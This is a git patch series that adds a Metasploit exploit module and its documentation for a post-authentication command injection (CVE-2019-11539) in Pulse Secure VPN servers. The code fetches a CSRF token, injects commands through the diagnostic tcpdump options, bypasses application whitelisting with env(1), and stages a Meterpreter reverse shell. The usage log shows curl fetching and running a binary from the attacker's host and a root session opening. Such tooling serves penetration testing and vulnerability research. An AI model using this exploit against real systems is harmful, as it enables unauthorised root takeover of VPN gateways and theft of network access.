From 77c26e9a7071f8eacd66025a99ec70de07fce94d Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 30 Oct 2019 20:08:02 -0500 Subject: [PATCH 01/19] Add Pulse Secure VPN arbitrary command execution --- .../linux/http/pulse_secure_cmd_exec.rb | 132 ++++++++++++++++++ 1 file changed, 132 insertions(+) create mode 100644 modules/exploits/linux/http/pulse_secure_cmd_exec.rb diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb new file mode 100644 index 0000000000..7d2381ec18 --- /dev/null +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb @@ -0,0 +1,132 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Pulse Secure VPN Arbitrary Command Execution', + 'Description' => %q{ + This module exploits a post-auth command injection in the Pulse Secure + VPN server to execute arbitrary commands as root. + }, + 'Author' => [ + 'Orange Tsai', # Discovery (@orange_8361) + 'Meh Chang', # Discovery (@mehqq_) + 'wvu' # Module + ], + 'References' => [ + ['CVE', '2019-11539'], + ['URL', 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/'], + ['URL', 'https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html'], + ['URL', 'https://hackerone.com/reports/591295'] + ], + 'DisclosureDate' => '2019-04-24', # Public disclosure + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Privileged' => true, + 'Targets' => [['Linux Dropper', {}]], + 'DefaultTarget' => 0, + 'DefaultOptions' => { + 'RPORT' => 443, + 'SSL' => true, + 'CMDSTAGER::SSL' => true, + 'PAYLOAD' => 'linux/x64/meterpreter_reverse_https' + }, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK], + 'RelatedModules' => ['auxiliary/gather/pulse_secure_file_disclosure'] + } + )) + + register_options([ + OptString.new('SID', [true, 'Valid session ID']) + ]) + end + + def exploit + get_csrf_token + + execute_cmdstager( + flavor: :curl, + noconcat: true + ) + end + + def get_csrf_token + @cookie = "DSID=#{datastore['SID']}" + print_good("Setting session cookie: #{@cookie}") + + print_status('Obtaining CSRF token') + res = send_request_cgi( + 'method' => 'GET', + 'uri' => diag_cgi, + 'cookie' => @cookie + ) + + unless res && res.code == 200 && (@csrf_token = parse_csrf_token(res.body)) + fail_with(Failure::NoAccess, 'Session cookie expired') + end + + print_good("CSRF token: #{@csrf_token}") + end + + def parse_csrf_token(body) + body.to_s.scan(/xsauth=([[:xdigit:]]+)/).flatten.first + end + + def execute_command(cmd, _opts = {}) + # Prepend absolute path to curl(1), since it's not in $PATH + cmd.prepend('/home/bin/') if cmd.start_with?('curl') + + # Bypass application whitelisting with permitted env(1) + cmd.prepend('env ') + + vprint_status("Executing command: #{cmd}") + print_status("Yeeting exploit at #{full_uri(diag_cgi)}") + res = send_request_cgi( + 'method' => 'GET', + 'uri' => diag_cgi, + 'cookie' => @cookie, + 'vars_get' => { + 'a' => 'td', # tcpdump + 'options' => sploit(cmd), + 'xsauth' => @csrf_token, + 'toggle' => 'Start Sniffing' + } + ) + + unless res && res.code == 200 + fail_with(Failure::UnexpectedReply, 'Could not yeet exploit') + end + + print_status("Triggering payload at #{full_uri(setcookie_cgi)}") + send_request_cgi( + 'method' => 'GET', + 'uri' => setcookie_cgi + ) + end + + def sploit(cmd) + %(-r$x="#{cmd}",system$x# 2>/data/runtime/tmp/tt/setcookie.thtml.ttc <) + end + + def diag_cgi + '/dana-admin/diag/diag.cgi' + end + + def setcookie_cgi + '/dana-na/auth/setcookie.cgi' + end + +end From f3a6aeea60ce8e342099ae4a9fc50ff8f13af9af Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 30 Oct 2019 20:31:58 -0500 Subject: [PATCH 02/19] Add true post_auth? definition --- modules/exploits/linux/http/pulse_secure_cmd_exec.rb | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb index 7d2381ec18..b59effae62 100644 --- a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb @@ -54,6 +54,10 @@ class MetasploitModule < Msf::Exploit::Remote ]) end + def post_auth? + true + end + def exploit get_csrf_token From 81da0d18c6da73dab7dd5868b4c4c843788b3e02 Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 30 Oct 2019 20:41:57 -0500 Subject: [PATCH 03/19] Add blurb about pre-auth file read --- modules/exploits/linux/http/pulse_secure_cmd_exec.rb | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb index b59effae62..bea43a789e 100644 --- a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb @@ -16,6 +16,10 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a post-auth command injection in the Pulse Secure VPN server to execute arbitrary commands as root. + + Please see related module auxiliary/gather/pulse_secure_file_disclosure + for a pre-auth file read that is able to obtain plaintext and hashed + credentials, plus session IDs that may be used with this exploit. }, 'Author' => [ 'Orange Tsai', # Discovery (@orange_8361) From 5b825e8245d238a34d83d9294ce96360ba1535be Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 12 Nov 2019 00:31:01 -0600 Subject: [PATCH 04/19] Readd cmd/unix/generic target with manual badchars --- .../linux/http/pulse_secure_cmd_exec.rb | 72 ++++++++++++------- 1 file changed, 47 insertions(+), 25 deletions(-) diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb index bea43a789e..13c82f67a4 100644 --- a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb @@ -12,8 +12,8 @@ class MetasploitModule < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Pulse Secure VPN Arbitrary Command Execution', - 'Description' => %q{ + 'Name' => 'Pulse Secure VPN Arbitrary Command Execution', + 'Description' => %q{ This module exploits a post-auth command injection in the Pulse Secure VPN server to execute arbitrary commands as root. @@ -21,35 +21,52 @@ class MetasploitModule < Msf::Exploit::Remote for a pre-auth file read that is able to obtain plaintext and hashed credentials, plus session IDs that may be used with this exploit. }, - 'Author' => [ + 'Author' => [ 'Orange Tsai', # Discovery (@orange_8361) 'Meh Chang', # Discovery (@mehqq_) 'wvu' # Module ], - 'References' => [ + 'References' => [ ['CVE', '2019-11539'], ['URL', 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/'], ['URL', 'https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html'], ['URL', 'https://hackerone.com/reports/591295'] ], - 'DisclosureDate' => '2019-04-24', # Public disclosure - 'License' => MSF_LICENSE, - 'Platform' => 'linux', - 'Arch' => [ARCH_X86, ARCH_X64], - 'Privileged' => true, - 'Targets' => [['Linux Dropper', {}]], - 'DefaultTarget' => 0, - 'DefaultOptions' => { - 'RPORT' => 443, - 'SSL' => true, - 'CMDSTAGER::SSL' => true, - 'PAYLOAD' => 'linux/x64/meterpreter_reverse_https' + 'DisclosureDate' => '2019-04-24', # Public disclosure + 'License' => MSF_LICENSE, + 'Platform' => ['unix', 'linux'], + 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], + 'Privileged' => true, + 'Targets' => [ + ['Unix In-Memory', + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Type' => :unix_memory, + 'Payload' => { + 'BadChars' => %Q(&*(){}[]`;|?\n~<>"'), + 'Encoder' => 'generic/none' # Force manual badchar analysis + }, + 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/generic'} + ], + ['Linux Dropper', + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Type' => :linux_dropper, + 'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'} + ] + ], + 'DefaultTarget' => 1, + 'DefaultOptions' => { + 'RPORT' => 443, + 'SSL' => true, + 'CMDSTAGER::SSL' => true, + 'PAYLOAD' => 'linux/x64/meterpreter_reverse_https' }, - 'Notes' => { - 'Stability' => [CRASH_SAFE], - 'Reliability' => [REPEATABLE_SESSION], - 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK], - 'RelatedModules' => ['auxiliary/gather/pulse_secure_file_disclosure'] + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK], + 'RelatedModules' => ['auxiliary/gather/pulse_secure_file_disclosure'] } )) @@ -65,10 +82,15 @@ class MetasploitModule < Msf::Exploit::Remote def exploit get_csrf_token - execute_cmdstager( - flavor: :curl, - noconcat: true - ) + case target['Type'] + when :unix_memory + execute_command(payload.encoded) + when :linux_dropper + execute_cmdstager( + flavor: :curl, + noconcat: true + ) + end end def get_csrf_token From 09901fdf5602bf007b8b88f1190d4dda764aff96 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 12 Nov 2019 01:08:25 -0600 Subject: [PATCH 05/19] Clarify session cookie could be invalid --- modules/exploits/linux/http/pulse_secure_cmd_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb index 13c82f67a4..016e6e4cce 100644 --- a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb @@ -105,7 +105,7 @@ class MetasploitModule < Msf::Exploit::Remote ) unless res && res.code == 200 && (@csrf_token = parse_csrf_token(res.body)) - fail_with(Failure::NoAccess, 'Session cookie expired') + fail_with(Failure::NoAccess, 'Session cookie expired or invalid') end print_good("CSRF token: #{@csrf_token}") From f4c76902474f91b765211ce874586368d3dac216 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 12 Nov 2019 01:08:56 -0600 Subject: [PATCH 06/19] Print cmd/unix/generic command output, minus HTML --- modules/exploits/linux/http/pulse_secure_cmd_exec.rb | 11 ++++++++++- 1 file changed, 10 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb index 016e6e4cce..f1d8d604b1 100644 --- a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb @@ -141,10 +141,19 @@ class MetasploitModule < Msf::Exploit::Remote end print_status("Triggering payload at #{full_uri(setcookie_cgi)}") - send_request_cgi( + res = send_request_cgi( 'method' => 'GET', 'uri' => setcookie_cgi ) + + # 200 response code, yet 500 error in body + if res.body.include?('500 Internal Error') + fail_with(Failure::PayloadFailed, 'Could not execute payload') + end + + if datastore['PAYLOAD'] == 'cmd/unix/generic' + print_line(res.body.sub(/\s*.*/m, '')) + end end def sploit(cmd) From e9fb4a2528caa86b2b06934752032683d93734eb Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 12 Nov 2019 01:10:26 -0600 Subject: [PATCH 07/19] Check for nil Oops. --- modules/exploits/linux/http/pulse_secure_cmd_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb index f1d8d604b1..57409a981b 100644 --- a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb @@ -147,7 +147,7 @@ class MetasploitModule < Msf::Exploit::Remote ) # 200 response code, yet 500 error in body - if res.body.include?('500 Internal Error') + unless res && res.code == 200 && !res.body.include?('500 Internal Error') fail_with(Failure::PayloadFailed, 'Could not execute payload') end From 8664ac9dd81233a4a3bbf580c64e2d6d77295c00 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 12 Nov 2019 01:17:28 -0600 Subject: [PATCH 08/19] Add target print --- modules/exploits/linux/http/pulse_secure_cmd_exec.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb index 57409a981b..6774025ed4 100644 --- a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb @@ -82,6 +82,8 @@ class MetasploitModule < Msf::Exploit::Remote def exploit get_csrf_token + print_status("Executing #{target.name} target") + case target['Type'] when :unix_memory execute_command(payload.encoded) From 2c6c46701c3d91f77aee4b37199a8d6038d9ffda Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 12 Nov 2019 01:23:53 -0600 Subject: [PATCH 09/19] Update DefaultOptions --- modules/exploits/linux/http/pulse_secure_cmd_exec.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb index 6774025ed4..bc4414eea0 100644 --- a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb @@ -53,14 +53,14 @@ class MetasploitModule < Msf::Exploit::Remote 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :linux_dropper, 'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'} + } ] ], 'DefaultTarget' => 1, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, - 'CMDSTAGER::SSL' => true, - 'PAYLOAD' => 'linux/x64/meterpreter_reverse_https' + 'CMDSTAGER::SSL' => true }, 'Notes' => { 'Stability' => [CRASH_SAFE], From bc5b0645dd176f12f9370507ddde1868675bf1a2 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 12 Nov 2019 01:25:36 -0600 Subject: [PATCH 10/19] Fix typo --- modules/exploits/linux/http/pulse_secure_cmd_exec.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb index bc4414eea0..f45daaabca 100644 --- a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb @@ -53,7 +53,6 @@ class MetasploitModule < Msf::Exploit::Remote 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :linux_dropper, 'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'} - } ] ], 'DefaultTarget' => 1, From 1573664c781a49797bc619c3d53f857b74e125d8 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 12 Nov 2019 01:41:19 -0600 Subject: [PATCH 11/19] Reduce timeout for when the shell pops --- modules/exploits/linux/http/pulse_secure_cmd_exec.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb index f45daaabca..7c95176491 100644 --- a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb @@ -142,10 +142,10 @@ class MetasploitModule < Msf::Exploit::Remote end print_status("Triggering payload at #{full_uri(setcookie_cgi)}") - res = send_request_cgi( + res = send_request_cgi({ 'method' => 'GET', 'uri' => setcookie_cgi - ) + }, 3.5) # 200 response code, yet 500 error in body unless res && res.code == 200 && !res.body.include?('500 Internal Error') From d8e612726cb16530f4a7ec087e0ca8cf0ac6f6c7 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 12 Nov 2019 01:46:23 -0600 Subject: [PATCH 12/19] Note that an admin SID is required at present --- modules/exploits/linux/http/pulse_secure_cmd_exec.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb index 7c95176491..6feae37942 100644 --- a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb @@ -20,6 +20,8 @@ class MetasploitModule < Msf::Exploit::Remote Please see related module auxiliary/gather/pulse_secure_file_disclosure for a pre-auth file read that is able to obtain plaintext and hashed credentials, plus session IDs that may be used with this exploit. + + A valid administrator session ID is required in lieu of untested SSRF. }, 'Author' => [ 'Orange Tsai', # Discovery (@orange_8361) @@ -70,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote )) register_options([ - OptString.new('SID', [true, 'Valid session ID']) + OptString.new('SID', [true, 'Valid admin session ID']) ]) end From 238c931fd3bdaee7a115fd44779de25e40463d6e Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 12 Nov 2019 01:55:56 -0600 Subject: [PATCH 13/19] Don't fail module if blocking through timeout --- modules/exploits/linux/http/pulse_secure_cmd_exec.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb index 6feae37942..459c9f50fc 100644 --- a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb @@ -151,7 +151,8 @@ class MetasploitModule < Msf::Exploit::Remote # 200 response code, yet 500 error in body unless res && res.code == 200 && !res.body.include?('500 Internal Error') - fail_with(Failure::PayloadFailed, 'Could not execute payload') + print_error('Payload execution may have failed') + return end if datastore['PAYLOAD'] == 'cmd/unix/generic' From de72ed85457c44083434846335113525946bb187 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 12 Nov 2019 02:02:53 -0600 Subject: [PATCH 14/19] Print our glorious success --- modules/exploits/linux/http/pulse_secure_cmd_exec.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb index 459c9f50fc..3e9a1da6e5 100644 --- a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb @@ -155,6 +155,8 @@ class MetasploitModule < Msf::Exploit::Remote return end + print_good('Payload execution successful') + if datastore['PAYLOAD'] == 'cmd/unix/generic' print_line(res.body.sub(/\s*.*/m, '')) end From 0c4580f2546bfe37f3cb5fce6122ce207a14e01f Mon Sep 17 00:00:00 2001 From: wvu-r7 Date: Tue, 12 Nov 2019 02:03:52 -0600 Subject: [PATCH 15/19] Calibrate timeout for hax Co-Authored-By: bcoles --- modules/exploits/linux/http/pulse_secure_cmd_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb index 3e9a1da6e5..86663bff3c 100644 --- a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb @@ -147,7 +147,7 @@ class MetasploitModule < Msf::Exploit::Remote res = send_request_cgi({ 'method' => 'GET', 'uri' => setcookie_cgi - }, 3.5) + }, 3.1337) # 200 response code, yet 500 error in body unless res && res.code == 200 && !res.body.include?('500 Internal Error') From 8df559eceb9172e788dddc54e8292c4d3d9f322b Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 12 Nov 2019 02:09:10 -0600 Subject: [PATCH 16/19] Update print to warning --- modules/exploits/linux/http/pulse_secure_cmd_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb index 86663bff3c..43c6f420c0 100644 --- a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb @@ -151,7 +151,7 @@ class MetasploitModule < Msf::Exploit::Remote # 200 response code, yet 500 error in body unless res && res.code == 200 && !res.body.include?('500 Internal Error') - print_error('Payload execution may have failed') + print_warning('Payload execution may have failed') return end From a17b2c20413ecb5257c3fd6b89b790dc6976bf9a Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 12 Nov 2019 02:10:10 -0600 Subject: [PATCH 17/19] Add module doc --- .../linux/http/pulse_secure_cmd_exec.md | 77 +++++++++++++++++++ 1 file changed, 77 insertions(+) create mode 100644 documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md diff --git a/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md b/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md new file mode 100644 index 0000000000..f1d71bb6e7 --- /dev/null +++ b/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md @@ -0,0 +1,77 @@ +## Introduction + +This module exploits a post-auth command injection in the Pulse Secure +VPN server to execute arbitrary commands as root. + +Please see related module `auxiliary/gather/pulse_secure_file_disclosure` +for a pre-auth file read that is able to obtain plaintext and hashed +credentials, plus session IDs that may be used with this exploit. + +A valid administrator session ID is required in lieu of untested SSRF. + +## Targets + +``` +Id Name +-- ---- +0 Unix In-Memory +1 Linux Dropper +``` + +## Options + +**SID** + +Set this to a valid administrator session ID. Typically retrieved using +the `auxiliary/gather/pulse_secure_file_disclosure` module. + +## Usage + +``` +msf5 exploit(linux/http/pulse_secure_cmd_exec) > set sid 676f5f892e8c4a6419f10564f9e9d857 +sid => 676f5f892e8c4a6419f10564f9e9d857 +msf5 exploit(linux/http/pulse_secure_cmd_exec) > run + +[*] Started reverse TCP handler on 127.0.0.1:[redacted] +[+] Setting session cookie: DSID=676f5f892e8c4a6419f10564f9e9d857 +[*] Obtaining CSRF token +[+] CSRF token: 6b0e020e1de8c68c043ea0e4f663b7a5 +[*] Executing Linux Dropper target +[*] Using URL: https://0.0.0.0:[redacted]/HSEjp77 +[*] Local IP: https://[redacted]:[redacted]/HSEjp77 +[*] Generated command stager: ["curl -kso /tmp/qlUqDxCU https://[redacted]:[redacted]/HSEjp77", "chmod +x /tmp/qlUqDxCU", "/tmp/qlUqDxCU", "rm -f /tmp/qlUqDxCU"] +[*] Executing command: env /home/bin/curl -kso /tmp/qlUqDxCU https://[redacted]:[redacted]/HSEjp77 +[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi +[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi +[*] Client 127.0.0.1 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.19.7 OpenSSL/1.0.1h zlib/1.2.3 libidn/1.18) requested /HSEjp77 +[*] Sending payload to 127.0.0.1 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.19.7 OpenSSL/1.0.1h zlib/1.2.3 libidn/1.18) +[+] Payload execution successful +[*] Command Stager progress - 63.96% done (71/111 bytes) +[*] Executing command: env chmod +x /tmp/qlUqDxCU +[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi +[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi +[+] Payload execution successful +[*] Command Stager progress - 87.39% done (97/111 bytes) +[*] Executing command: env /tmp/qlUqDxCU +[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi +[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi +[*] Meterpreter session 1 opened (127.0.0.1:[redacted] -> 127.0.0.1:53200) at 2019-11-12 02:05:40 -0600 +[!] Payload execution may have failed +[*] Command Stager progress - 102.70% done (114/111 bytes) +[*] Executing command: env rm -f /tmp/qlUqDxCU +[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi +[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi +[+] Payload execution successful +[*] Command Stager progress - 123.42% done (137/111 bytes) +[*] Server stopped. + +meterpreter > getuid +Server username: uid=0, gid=0, euid=0, egid=0 +meterpreter > sysinfo +Computer : [redacted] +OS : (Linux 2.6.32-00486-gddd7e32-dirty) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +meterpreter > +``` From a267ad9d64b7479116f6a850d65e6e046e5f3a1d Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 12 Nov 2019 02:17:58 -0600 Subject: [PATCH 18/19] Reference env(1) as the reason we have useful RCE --- .../modules/exploit/linux/http/pulse_secure_cmd_exec.md | 3 ++- modules/exploits/linux/http/pulse_secure_cmd_exec.rb | 3 ++- 2 files changed, 4 insertions(+), 2 deletions(-) diff --git a/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md b/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md index f1d71bb6e7..7630c2a2ad 100644 --- a/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md +++ b/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md @@ -1,7 +1,8 @@ ## Introduction This module exploits a post-auth command injection in the Pulse Secure -VPN server to execute arbitrary commands as root. +VPN server to execute commands as root. The env(1) command is used to +bypass application whitelisting and run arbitrary commands. Please see related module `auxiliary/gather/pulse_secure_file_disclosure` for a pre-auth file read that is able to obtain plaintext and hashed diff --git a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb index 43c6f420c0..dbfd70c482 100644 --- a/modules/exploits/linux/http/pulse_secure_cmd_exec.rb +++ b/modules/exploits/linux/http/pulse_secure_cmd_exec.rb @@ -15,7 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Pulse Secure VPN Arbitrary Command Execution', 'Description' => %q{ This module exploits a post-auth command injection in the Pulse Secure - VPN server to execute arbitrary commands as root. + VPN server to execute commands as root. The env(1) command is used to + bypass application whitelisting and run arbitrary commands. Please see related module auxiliary/gather/pulse_secure_file_disclosure for a pre-auth file read that is able to obtain plaintext and hashed From a8e289ee9ccd2d09f1bc327ea366b51f27255608 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 12 Nov 2019 02:46:18 -0600 Subject: [PATCH 19/19] Code-block env(1) --- .../modules/exploit/linux/http/pulse_secure_cmd_exec.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md b/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md index 7630c2a2ad..a8a7d668f0 100644 --- a/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md +++ b/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md @@ -1,7 +1,7 @@ ## Introduction This module exploits a post-auth command injection in the Pulse Secure -VPN server to execute commands as root. The env(1) command is used to +VPN server to execute commands as root. The `env(1)` command is used to bypass application whitelisting and run arbitrary commands. Please see related module `auxiliary/gather/pulse_secure_file_disclosure`